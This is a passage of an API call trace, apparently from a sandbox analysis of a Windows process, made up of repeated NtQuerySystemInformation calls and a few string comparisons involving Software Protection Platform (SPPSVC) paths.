Length=0x0, ResultLength=0x0) [0240.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0240.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.696] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0240.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0240.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0240.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eff0, Length=0x28, ResultLength=0x0) [0240.705] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x28, ResultLength=0x0) [0240.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0240.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0240.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0240.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0240.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0240.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0240.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0240.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eff0, Length=0x28, ResultLength=0x0) [0240.714] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x28, ResultLength=0x0) [0240.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0240.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0240.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0240.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0240.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0240.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0240.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0240.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eff0, Length=0x28, ResultLength=0x0) [0240.724] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x28, ResultLength=0x0) [0240.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0240.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0240.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.731] NtQuerySystemInformation (SystemInformationClass=0xb9, 